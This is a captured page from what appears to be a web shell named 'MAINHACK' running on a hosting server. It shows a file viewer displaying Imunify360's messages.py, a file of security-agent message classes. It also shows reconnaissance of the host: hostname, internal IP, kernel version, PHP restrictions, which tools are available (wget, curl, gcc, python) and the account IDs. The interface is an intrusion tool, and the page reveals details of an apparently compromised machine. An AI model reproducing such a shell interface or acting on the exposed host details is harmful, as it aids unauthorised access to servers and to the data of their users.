[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: messages.py
File is not writable. Editing disabled.
from defence360agent import utils from defence360agent.contracts.messages import ( Accumulatable, Message, MessageList, Received, Reportable, ShortenReprListMixin ) from im360.contracts.message_pb2 import WebShieldData from im360.utils.validate import IP HIGHEST_PRIORITY = 0 class StrategyChange(Message): """The message is generated when an IDS change is detected.""" DEFAULT_METHOD = 'STRATEGY_CHANGE' PRIORITY = HIGHEST_PRIORITY class SensorIncident(Message): """Single incident, e.g. user auth failed once""" DEFAULT_METHOD = 'INCIDENT' class SensorIncidentList(MessageList, Reportable): """Aggregated incident list""" DEFAULT_METHOD = 'INCIDENT_LIST' class UnreportableLocalIncidentList(MessageList): """Aggregate local incident list that are not reported to server""" DEFAULT_METHOD = 'LOCALINCIDENT_LIST' class LocalIncidentList(MessageList, Reportable): """Aggregate local incident list - where no ip provided""" DEFAULT_METHOD = 'INCIDENT_LIST' class SensorAlert(Message, Reportable): """Alert incident, e.g. user auth failures reached threshold""" DEFAULT_METHOD = 'ALERT' PRIORITY = 1 @classmethod def from_incident(cls, message): """When generate ALERT from INCIDENT change method""" new_message = message.copy() new_message['method'] = cls.DEFAULT_METHOD return cls(**new_message) class ClientUnblock(Message, Reportable): DEFAULT_METHOD = 'UNBLOCK' PRIORITY = HIGHEST_PRIORITY class CaptchaEventList(ShortenReprListMixin, Message, Reportable): DEFAULT_METHOD = 'CAPTCHA_LIST' class CaptchaEvent(Accumulatable): DEFAULT_METHOD = 'CAPTCHA' FAILED = 'FAILED' PASSED = 'PASSED' REQUESTED = 'REQUESTED' LIST_CLASS = CaptchaEventList @classmethod def from_parcel(cls, parcel): if parcel.websh.captcha == WebShieldData.NA: return None return cls( timestamp=parcel.timestamp, attackers_ip=parcel.ip, event=WebShieldData.Captcha.Name(parcel.websh.captcha), user_id=parcel.websh.user_id, plugin_id='captcha', ) class CaptchaDosAlert(Message): DEFAULT_METHOD = 'CAPTCHA_DOS_ALERT' PRIORITY = 1 class SynclistResponse(Message, Received): DEFAULT_METHOD = 'SYNCLIST' PRIORITY = 2 @utils.sync.timefun( action="SynclistResponse{str->IP.adopt_to_ipvX_network}") def __init__(self, *args, **kwargs): """ Do str -> Union[IPv4Network, IPv6Network] conversion only once per SynclistResponse message processing :raise ValueError: if str keys to IPv4Network, IPv6Network conversion fails """ super().__init__(*args, **kwargs) for field in ["blocklist", "unblocklist"]: self[field] = { IP.adopt_to_ipvX_network(ip_str): dict_ for ip_str, dict_ in self[field].items() } @staticmethod def filter_blocklist(ips: dict, *, action_type: str): """Given [un]blocklist *ips* with their properties return ips matching given *action_type*. ip without an action type set matches any action type. """ return ( ip for ip, p in (ips.items() if ips else []) if not p # no properties or "action_type" not in p # no action_type or p["action_type"] == action_type # with given action_type ) class SynclistRequest(Message, Reportable): DEFAULT_METHOD = 'SYNCLIST' class BlockUnblockList(Message): """Used internally for block/unblock ip from lists { "blocklist": {(IPNetwork, "listname"): {"expiration": int}}, "unblocklist": [(IPNetwork,"listname")] , } If ip is present in both lists: first unblock then block it (upsert semantics if applicable). """ DEFAULT_METHOD = "BLOCK_UNBLOCK" PRIORITY = HIGHEST_PRIORITY class ProactiveQueueList(MessageList, Reportable): DEFAULT_METHOD = 'PROACTIVE_QUEUE_LIST' class RuleDisabled(Message, Reportable): """ Rule disabled by customer """ DEFAULT_METHOD = 'RULE_DISABLED' class RuleEnabled(Message, Reportable): """ Rule enabled back """ DEFAULT_METHOD = 'RULE_ENABLED' class ConfigSet(Message, Received): """Updates to the agent's config.""" RECEIVED_ACTIONS = ['CONFIG_SET'] class UpdateCustomLists(Message): """ Send message for class RealProtector for updating custom ip white and black list """ DEFAULT_METHOD = "UPDATE_CUSTOM_LISTS" class GroupIPSync(Message, Reportable): DEFAULT_METHOD = 'GROUP_SYNC' class GroupIPSyncPush(Message, Received): DEFAULT_METHOD = 'GROUP_SYNC' class EnduserPasswordReset(Message, Received): DEFAULT_METHOD = "ENDUSER_PASSWORD_RESET"
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.07 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A